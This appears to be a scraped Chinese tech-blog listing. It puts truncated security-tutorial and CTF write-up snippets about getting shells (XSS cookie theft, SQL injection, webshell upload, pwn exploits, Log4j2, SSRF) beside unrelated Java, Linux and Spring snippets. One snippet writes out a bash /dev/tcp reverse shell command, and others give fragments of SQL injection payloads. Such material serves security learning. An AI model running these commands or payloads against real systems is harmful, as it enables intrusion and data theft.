- web 安全 xss 蓝莲花平台获取服务器过程
lin_1226
web安全安全
xss分类xss跨站脚本攻击分为:反射型,存储型(存储在数据库等),DOM型反射型非持久型,攻击方式具有一次性,每次需要输入弹出,出现在URL中作为参数请求服务器,服务器解析并响应存储型持久型,存在服务器上,数据库、文件等DOM型xss平台——拿到后台——提权——拿服务器密码过程搭建蓝莲花平台利用xss平台拿到的cookie,登录后台利用漏洞上传一句话木马菜刀连接,getshell上传cmd、pr
- 【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入,SQL注入点利用以及getshell_sqlsever数据库报错注入
2401_84970893
程序员数据库web安全sql
##询所有数据库名,除了masterand(selecttop1namefrommaster..sysdatabaseswherenamenotin('master'))>0##查询所有数据库名,除了master,iNethinkCMSand(selecttop1namefrommaster..sysdatabaseswherenamenotin('master','aini'))>0##查询所有
- 文件包含+文件上传漏洞(图片马绕过)
郑居中3.0
web漏洞文件包含文件上传图片马php伪协议
目录一.文件包含二.文件上传三.图片马四.题目一.文件包含将已有的代码以文件形式包含到某个指定的代码中,从而使用其中的代码或者数据,一般是为了方便直接调用所需文件,文件包含的存在使得开发变得更加灵活和方便(若对用户输入的数据不严格的过滤,会导致信息泄露,getshell等风险)常见文件包含函数include():当文件发生错误时,提出警告,脚本继续执行include_once():如果文件被包含过
- 渗透某巨型企业某个系统的奇葩姿势
zkzq
网络安全渗透测试漏洞
本文由掌控安全学院-urfyyyy投稿前言这个月都在做一个巨型合作企业的渗透测试,这个系统本无方式getshell,得亏我心够细,想的多,姿势够骚。文中重码,且漏洞已修复。过程找到getshell点目标系统功能很少,基本上就是一个展示页面,没有增删改功能,仅能查,基本上半小时不到就把所有功能都看完了,完全没有能getshell的功能点此时查询功能的一个url引起了我的怀疑,反手随便搜索了一个123
- pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
晓幂
安全
题目分析1首先打开这个题目的链接的时候,看到了ret2syscall,以为是一个纯正的syscall的题,结果,做的时候发现这个题的危险函数限制的字符串个数不足以写入syscall需要的所有地址,所以,这里参考dalao们的方法,/做出了这道题,这里记录一下。首先,checksec看一下这个题目的保护以及架构:是一个32位小端序程序,开了栈不可执行的保护,所以初步判断,stack的ret2shel
- 【操作系统】Kali Linux v2023.4 官方版(超详细,保姆级教程)
勇敢许牛牛在线大闯关
网安工具linux安全学习网络安全
镜像下载镜像链接:【操作系统】KaliLinuxv2023.4官方版-极核GetShell(get-shell.com)其他镜像链接:(按需下载):在这里我选择的清华源,点击直链下载后面的链接进行下载。需要其他镜像文件的可以前往官网地址或者其他源镜站进行下载。安装kali1.打开Vmware首页,创建新的虚拟机。2.在这里,我们选择简单一点的安装方式-典型安装3.选择稍后安装操作系统4.选择Lin
- [BUUCTF]-PWN:mrctf2020_easy_equation解析
Clxhzg
PWN网络安全安全
查看保护再看ida很明了,题目就是让我们用格式化字符串漏洞修改judge的值(可以用python脚本进行计算,最终算出来得2)使等式成立,然后getshell。虽然操作比较简单,但我还是列出了几种方法解法一:frompwnimport*context(log_level='debug')p=process('./equation')judge=0x60105Cpayload=b'bb'+b'%9$
- 数据库攻防学习之MySQL
MySQL0x01mysql学习MySQL是瑞典的MySQLAB公司开发的一个可用于各种流行操作系统平台的关系数据库系统,它具有客户机/服务器体系结构的分布式数据库管理系统。可以免费使用使用,用的人数很多。0x02环境搭建这里演示用,phpstudy搭建的环境,然后安装phpmyadmin0x03漏洞复现日志文件包含getshell利用前提知道网站路径,mysql版本大于5.0利用条件需要可读可写
- 记一次VulnStack渗透
网安Dokii
网络安全
信息收集netdiscover的主机发现部分不再详解,通过访问端口得知20001-2003端口都为web端口,所以优先考虑从此方向下手外网渗透GetShellStruct漏洞访问2001端口后,插件Wappalyzer爬取得知这是一个基于Struct的web站点,直接考虑struct工具,一把梭发现struct2漏洞,无法完整获得webshell,只有一个RCE权限,这里可以采用这种方法:在rev
- [BUUCTF]-PWN:inndy_echo解析
Clxhzg
PWNpython开发语言安全网络安全
查看保护查看ida有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦完整exp:frompwnimport*p=process('./echo')p=remote('node5.buuoj.cn',25852)system_plt=0x8048400printf_got=0x804
- [BUUCTF]-PWN:wustctf2020_easyfast解析
Clxhzg
PWNpython开发语言
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用doublefree有两种解法解法一(doublefree):完整exp:frompwnimport*context(log_level='debug')p=process('./easyfast')target
- CTF-PWN-堆-【chunk extend/overlapping-2】(hack.lu ctf 2015 bookstore)
Full-LLK
CTF-PWN-堆CTF-PWN
文章目录hack.luctf2015bookstore检查IDA源码main函数edit_notedelete_notesubmit.fini_array段劫持(回到main函数的方法)思路格式化字符串是啥呢0x开头或者没有0x开头的十六进制的字符串或字节的转换为整数构造格式化字符串的其他方法exp佛系getshell常规getshellhack.luctf2015bookstore检查got表可
- 1.30知识回顾&&SQL注入Bypass
[email protected]
sql数据库
不知不觉就一月三十日了,感觉摆着摆着就要开学了,开学的你belike:1.SQL注入GetShellsql注入其实是可以getshell的下面我们就来看一下它的两种类型1.intodumpfile要能实现这个getshell,需要满足以下条件该用户为root权限其配置secure_file_priv需要为空知道能访问得到的绝对路径于是我们就拿sqli的第二关为例我们这样构造pocunionsele
- 小白代码审计入门
墨痕诉清风
WEB及系统安全知识安全web安全
最近小白一直在学习代码审计,对于我这个没有代码审计的菜鸟来说确实是一件无比艰难的事情。但是着恰恰应了一句老话:万事开头难。但是小白我会坚持下去。何况现在已经喜欢上了代码审计,下面呢小白就说一下appcms后台模板Getshell以及读取任意文件,影响的版本是2.0.101版本。其实这个版本已经不用了,小白也是拿这个来说一下自己理解的php的代码审计。开源的CMS就是舒服,不仅可以对最新版的来做代码
- Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
lainwith
靶机Vulnhub
目录介绍信息收集主机发现端口扫描+开放端口探测网站探测特殊字符爆破纯字典爆破命令执行Getshell方式1:python反弹shell方式2:nc反弹shell文件传输爆破SSH提权:suid提权方式1:双重nc反弹shell方式2:python+MSF反弹shell参考介绍系列:BoredHackerBlog(此系列共4台)发布日期:2020年03月29日难度:初级-中级靶机地址:https:/
- Log4j2漏洞复现
Lend me
log4j
Log4j2漏洞复现原理介绍因为Log4j2默认支持解析ldap/rmi协议,所以黑客只需构造恶意的JNDI接口,然后服务器通过log4j2解析jndi接口并调用lookup函数,使得服务器去引用黑客构造好的恶意类,从而达到getshell影响版本:log4j2.x&/dev/tcp/攻击机地址地址/攻击机端口号0>&1//由于docker容器里面没有nc,所以只能使用原生命令进行shell反弹3
- SSRF——服务端请求伪造
正在过坎
网络基础小白入坑笔记安全服务器http
什么是SSRF?服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务)ssrf有什么作用一般用于探测内网端口及信息,查看文件,甚至可以getshell攻击内外网的web应用。ssrf一般存在于哪些地方能够对外发起网络请求的地方,可能存在ssrf从远程服务器请求资源处。如何判断是否有ssrf从
- 【Pwn | CTF】BUUCTF rip1
星盾网安
linux服务器
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是/bin/sh之类的就是直接getshell,如果是普通命令的话,应该就是getflag了IDA64位打开文件第8行的函数是把一个东西放进S这个字符串数组变量里sub_40060D这个函数就是重点,点进去一看就是我们的目标system("catflag.txt")getflag的函数main最后一行就是gets函数,应该就是利用
- 一个简单的getshell
赴前尘
渗透测试服务器网络网络安全
1.过程1.1攻击者(attacker)主机监听本地端口nc-lvp$port2.2受害者(victim)主机执行反弹shell命令bash-i>&/dev/tcp/$attacker_ip/$port0>&1作用:将受害者(victim)主机的标准输入、标准输出、错误输出全都重定向到攻击者(attacker)主机上2.演示2.1攻击者(attacker
- phpMyAdmin 未授权Getshell
合天网安实验室
渗透测试漏洞挖掘经验分享phpMyAdmin渗透测试Getshell
前言做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。0x01漏洞发现环境搭建使用metasploitable2,可在网上搜索下载,搭建很简单这里不多说了。发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。发现setup0x02漏洞利用进行漏洞利用https://juejin.cn/post/7042
- SQL注入GetShell的方法(1)
|Print_r("("
sql数据库mysql
目录一、注入条件二、注入相关函数和语句三、联合写入四、分隔符写入五、日志写入六、堆叠写入七、--os-shell一、注入条件使用sql注入进行文件上传功能获取getshell,它有以下三个条件1、最高用户权限root2、网站的根路径3、开启secure_file_priv功能,要具有读写权限//查看读写权限showvariableslike'%secure%'(1)secure_file_priv
- SQL手工注入之getshell
唔系所有牛奶都叫特仑苏。
第一次写文章,内容有些简单,大佬们轻喷。。SQL注入简介所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。SQL注入方式SQL注入有手工注入和工具注入两种方式,本文为手工注入,手工注入可以更好的理解注
- sql注入之GETSHELL
Z时代.bug(゜▽゜*)
理论sql笔记
2024.2.1GETSHELL利用SQL注入获取MYSQL数据库权限的要求:文件读写基本要求:是root用户最高权限知道网站的绝对路径文件读写注入的原理:利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息文件读写注入的条件:高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限secure_file_priv选项se
- src挖掘-教育行业平台,规则,批量自动化
ee .
小迪安全学习日志网络安全
src挖掘-教育行业平台,规则,批量自动化1.平台:cnvd漏洞平台,盒子,补天2.教育平台src-批量用最新漏洞去测试3.只收前端打入的漏洞平台-针对闭源系统先getshell,再进行白盒测试得到源码后:寻找web.config,看配置文件或源码,找asmx结尾的文件asmx是web服务文件。属于b/s形式,用soap方式http访问,用xml返回有asmx丢到awvs里js也可以爆破拿下cnv
- Vulnhub-FUNBOX: GAOKAO渗透
疯狂搞网安的18岁老登
Vulnhub靶机渗透网络安全网络安全安全威胁分析计算机网络
文章目录前言1、靶机ip配置2、渗透目标3、渗透概括开始实战一、信息获取二、爆破FTP服务三、GetShell四、提权前言 由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章! 本文靶机下载连接-戳我直接下载!1、靶机ip配置Kal
- BUUCTF-Pwn-ciscn_2019_es_2
餐桌上的猫
CTFPwn其他
题目截图例行检查同IDA打开查看字符串,找到system函数和一个与flag相关的字符串利用交叉引用找到Hack函数,其中调用了system函数,但是参数并不能让我们getshell或者得到flag继续查看主函数查看函数vul(),存在栈溢出,但是只溢出了8个字节,只能覆盖ebp和ret,可以考虑使用栈迁移函数vul()中有两次输入和两次输出,可以利用第一次输入和输出泄露ebp的值、计算栈顶地址、
- [BUUCTF]-PWN:ciscn_2019_es_7解析
Clxhzg
安全linux运维
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell解法一(系统调用execve):完整exp:frompwnimport*context(log_level='debug')p=process('./es7')ret=0x4003a9pop_rdi=0x
- 文件上传漏洞的利用和防御
非酋King
网络安全
1.什么是文件上传漏洞文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种漏洞是getShell最快最直接的方法之一。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。2.产生文件上传漏洞的原因未于上传文件的后缀名(扩展名)没有做较为严格的限制未于上传文件的MIMETYPE(用于描述文件的类
- 漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)
七天啊
#漏洞复现网络安全技术ApacheFlink文件上传漏洞CVE-2020-17518
文章目录一、ApacheFlink简介二、漏洞简介三、漏洞复现四、上传jar包getshell一、ApacheFlink简介ApacheFlink是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。ApacheFlink是一个分布式系统,它需要计算资源来执行应用程序。Flink集成了所有常见的集群资源管理
- Apache Flink 文件上传漏洞 (CVE-2020-17518)
zxl2605
#漏洞复现web安全web安全系统安全安全
文章目录一、ApacheFlink简介二、漏洞简介三、漏洞复现四、上传jar包getshell一、ApacheFlink简介ApacheFlink是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。ApacheFlink是一个分布式系统,它需要计算资源来执行应用程序。Flink集成了所有常见的集群资源管理
- 继之前的线程循环加到窗口中运行
3213213333332132
javathreadJFrameJPanel
之前写了有关java线程的循环执行和结束,因为想制作成exe文件,想把执行的效果加到窗口上,所以就结合了JFrame和JPanel写了这个程序,这里直接贴出代码,在窗口上运行的效果下面有附图。
package thread;
import java.awt.Graphics;
import java.text.SimpleDateFormat;
import java.util
- linux 常用命令
BlueSkator
linux命令
1.grep
相信这个命令可以说是大家最常用的命令之一了。尤其是查询生产环境的日志,这个命令绝对是必不可少的。
但之前总是习惯于使用 (grep -n 关键字 文件名 )查出关键字以及该关键字所在的行数,然后再用 (sed -n '100,200p' 文件名),去查出该关键字之后的日志内容。
但其实还有更简便的办法,就是用(grep -B n、-A n、-C n 关键
- php heredoc原文档和nowdoc语法
dcj3sjt126com
PHPheredocnowdoc
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Current To-Do List</title>
</head>
<body>
<?
- overflow的属性
周华华
JavaScript
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml&q
- 《我所了解的Java》——总体目录
g21121
java
准备用一年左右时间写一个系列的文章《我所了解的Java》,目录及内容会不断完善及调整。
在编写相关内容时难免出现笔误、代码无法执行、名词理解错误等,请大家及时指出,我会第一时间更正。
&n
- [简单]docx4j常用方法小结
53873039oycg
docx
本代码基于docx4j-3.2.0,在office word 2007上测试通过。代码如下:
import java.io.File;
import java.io.FileInputStream;
import ja
- Spring配置学习
云端月影
spring配置
首先来看一个标准的Spring配置文件 applicationContext.xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi=&q
- Java新手入门的30个基本概念三
aijuans
java新手java 入门
17.Java中的每一个类都是从Object类扩展而来的。 18.object类中的equal和toString方法。 equal用于测试一个对象是否同另一个对象相等。 toString返回一个代表该对象的字符串,几乎每一个类都会重载该方法,以便返回当前状态的正确表示.(toString 方法是一个很重要的方法) 19.通用编程:任何类类型的所有值都可以同object类性的变量来代替。
- 《2008 IBM Rational 软件开发高峰论坛会议》小记
antonyup_2006
软件测试敏捷开发项目管理IBM活动
我一直想写些总结,用于交流和备忘,然都没提笔,今以一篇参加活动的感受小记开个头,呵呵!
其实参加《2008 IBM Rational 软件开发高峰论坛会议》是9月4号,那天刚好调休.但接着项目颇为忙,所以今天在中秋佳节的假期里整理了下.
参加这次活动是一个朋友给的一个邀请书,才知道有这样的一个活动,虽然现在项目暂时没用到IBM的解决方案,但觉的参与这样一个活动可以拓宽下视野和相关知识.
- PL/SQL的过程编程,异常,声明变量,PL/SQL块
百合不是茶
PL/SQL的过程编程异常PL/SQL块声明变量
PL/SQL;
过程;
符号;
变量;
PL/SQL块;
输出;
异常;
PL/SQL 是过程语言(Procedural Language)与结构化查询语言(SQL)结合而成的编程语言PL/SQL 是对 SQL 的扩展,sql的执行时每次都要写操作
- Mockito(三)--完整功能介绍
bijian1013
持续集成mockito单元测试
mockito官网:http://code.google.com/p/mockito/,打开documentation可以看到官方最新的文档资料。
一.使用mockito验证行为
//首先要import Mockito
import static org.mockito.Mockito.*;
//mo
- 精通Oracle10编程SQL(8)使用复合数据类型
bijian1013
oracle数据库plsql
/*
*使用复合数据类型
*/
--PL/SQL记录
--定义PL/SQL记录
--自定义PL/SQL记录
DECLARE
TYPE emp_record_type IS RECORD(
name emp.ename%TYPE,
salary emp.sal%TYPE,
dno emp.deptno%TYPE
);
emp_
- 【Linux常用命令一】grep命令
bit1129
Linux常用命令
grep命令格式
grep [option] pattern [file-list]
grep命令用于在指定的文件(一个或者多个,file-list)中查找包含模式串(pattern)的行,[option]用于控制grep命令的查找方式。
pattern可以是普通字符串,也可以是正则表达式,当查找的字符串包含正则表达式字符或者特
- mybatis3入门学习笔记
白糖_
sqlibatisqqjdbc配置管理
MyBatis 的前身就是iBatis,是一个数据持久层(ORM)框架。 MyBatis 是支持普通 SQL 查询,存储过程和高级映射的优秀持久层框架。MyBatis对JDBC进行了一次很浅的封装。
以前也学过iBatis,因为MyBatis是iBatis的升级版本,最初以为改动应该不大,实际结果是MyBatis对配置文件进行了一些大的改动,使整个框架更加方便人性化。
- Linux 命令神器:lsof 入门
ronin47
lsof
lsof是系统管理/安全的尤伯工具。我大多数时候用它来从系统获得与网络连接相关的信息,但那只是这个强大而又鲜为人知的应用的第一步。将这个工具称之为lsof真实名副其实,因为它是指“列出打开文件(lists openfiles)”。而有一点要切记,在Unix中一切(包括网络套接口)都是文件。
有趣的是,lsof也是有着最多
- java实现两个大数相加,可能存在溢出。
bylijinnan
java实现
import java.math.BigInteger;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class BigIntegerAddition {
/**
* 题目:java实现两个大数相加,可能存在溢出。
* 如123456789 + 987654321
- Kettle学习资料分享,附大神用Kettle的一套流程完成对整个数据库迁移方法
Kai_Ge
Kettle
Kettle学习资料分享
Kettle 3.2 使用说明书
目录
概述..........................................................................................................................................7
1.Kettle 资源库管
- [货币与金融]钢之炼金术士
comsci
金融
自古以来,都有一些人在从事炼金术的工作.........但是很少有成功的
那么随着人类在理论物理和工程物理上面取得的一些突破性进展......
炼金术这个古老
- Toast原来也可以多样化
dai_lm
androidtoast
Style 1: 默认
Toast def = Toast.makeText(this, "default", Toast.LENGTH_SHORT);
def.show();
Style 2: 顶部显示
Toast top = Toast.makeText(this, "top", Toast.LENGTH_SHORT);
t
- java数据计算的几种解决方法3
datamachine
javahadoopibatisr-languer
4、iBatis
简单敏捷因此强大的数据计算层。和Hibernate不同,它鼓励写SQL,所以学习成本最低。同时它用最小的代价实现了计算脚本和JAVA代码的解耦,只用20%的代价就实现了hibernate 80%的功能,没实现的20%是计算脚本和数据库的解耦。
复杂计算环境是它的弱项,比如:分布式计算、复杂计算、非数据
- 向网页中插入透明Flash的方法和技巧
dcj3sjt126com
htmlWebFlash
将
Flash 作品插入网页的时候,我们有时候会需要将它设为透明,有时候我们需要在Flash的背面插入一些漂亮的图片,搭配出漂亮的效果……下面我们介绍一些将Flash插入网页中的一些透明的设置技巧。
一、Swf透明、无坐标控制 首先教大家最简单的插入Flash的代码,透明,无坐标控制: 注意wmode="transparent"是控制Flash是否透明
- ios UICollectionView的使用
dcj3sjt126com
UICollectionView的使用有两种方法,一种是继承UICollectionViewController,这个Controller会自带一个UICollectionView;另外一种是作为一个视图放在普通的UIViewController里面。
个人更喜欢第二种。下面采用第二种方式简单介绍一下UICollectionView的使用。
1.UIViewController实现委托,代码如
- Eos平台java公共逻辑
蕃薯耀
Eos平台java公共逻辑Eos平台java公共逻辑
Eos平台java公共逻辑
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
蕃薯耀 2015年6月1日 17:20:4
- SpringMVC4零配置--Web上下文配置【MvcConfig】
hanqunfeng
springmvc4
与SpringSecurity的配置类似,spring同样为我们提供了一个实现类WebMvcConfigurationSupport和一个注解@EnableWebMvc以帮助我们减少bean的声明。
applicationContext-MvcConfig.xml
<!-- 启用注解,并定义组件查找规则 ,mvc层只负责扫描@Controller -->
<
- 解决ie和其他浏览器poi下载excel文件名乱码
jackyrong
Excel
使用poi,做传统的excel导出,然后想在浏览器中,让用户选择另存为,保存用户下载的xls文件,这个时候,可能的是在ie下出现乱码(ie,9,10,11),但在firefox,chrome下没乱码,
因此必须综合判断,编写一个工具类:
/**
*
* @Title: pro
- 挥洒泪水的青春
lampcy
编程生活程序员
2015年2月28日,我辞职了,离开了相处一年的触控,转过身--挥洒掉泪水,毅然来到了兄弟连,背负着许多的不解、质疑——”你一个零基础、脑子又不聪明的人,还敢跨行业,选择Unity3D?“,”真是不自量力••••••“,”真是初生牛犊不怕虎•••••“,••••••我只是淡淡一笑,拎着行李----坐上了通向挥洒泪水的青春之地——兄弟连!
这就是我青春的分割线,不后悔,只会去用泪水浇灌——已经来到
- 稳增长之中国股市两点意见-----严控做空,建立涨跌停版停牌重组机制
nannan408
对于股市,我们国家的监管还是有点拼的,但始终拼不过飞流直下的恐慌,为什么呢?
笔者首先支持股市的监管。对于股市越管越荡的现象,笔者认为首先是做空力量超过了股市自身的升力,并且对于跌停停牌重组的快速反应还没建立好,上市公司对于股价下跌没有很好的利好支撑。
我们来看美国和香港是怎么应对股灾的。美国是靠禁止重要股票做空,在
- 动态设置iframe高度(iframe高度自适应)
Rainbow702
JavaScriptiframecontentDocument高度自适应局部刷新
如果需要对画面中的部分区域作局部刷新,大家可能都会想到使用ajax。
但有些情况下,须使用在页面中嵌入一个iframe来作局部刷新。
对于使用iframe的情况,发现有一个问题,就是iframe中的页面的高度可能会很高,但是外面页面并不会被iframe内部页面给撑开,如下面的结构:
<div id="content">
<div id=&quo
- 用Rapael做图表
tntxia
rap
function drawReport(paper,attr,data){
var width = attr.width;
var height = attr.height;
var max = 0;
&nbs
- HTML5 bootstrap2网页兼容(支持IE10以下)
xiaoluode
html5bootstrap
<!DOCTYPE html>
<html>
<head lang="zh-CN">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">